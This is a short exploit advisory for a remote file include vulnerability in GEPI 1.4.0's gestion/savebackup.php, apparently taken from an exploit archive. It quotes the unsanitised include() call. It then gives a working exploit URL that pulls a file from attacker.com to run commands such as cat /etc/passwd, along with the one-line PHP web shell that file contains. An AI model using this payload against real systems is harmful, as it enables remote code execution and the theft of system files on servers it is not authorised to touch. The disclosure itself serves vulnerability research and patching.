id: 1096
date: 10/31/2006
title: GEPI <= 1.4.0 gestion/savebackup.php Remote File Include Vulnerability
author: Sumit Siddharth
cves: 

======================================================================
GEPI <= 1.4.0 gestion/savebackup.php Remote File Include Vulnerability
======================================================================



Package:- gepi 1.4.0

impact:- highly critical ..System Access..
vulnerable code:-
      include($_GET['filename']);
in gepi/gestion/savebackup.php

Exploit:-
http://localhost/gepi/gestion/savebackup.php?filename=http://attacker.com/test.txt&cmd=cat
/etc/passwd

in test.txt
<? passthru("$_GET[cmd]");?>

Credits:-
$um$id



#  0day.today [2023-03-25]  #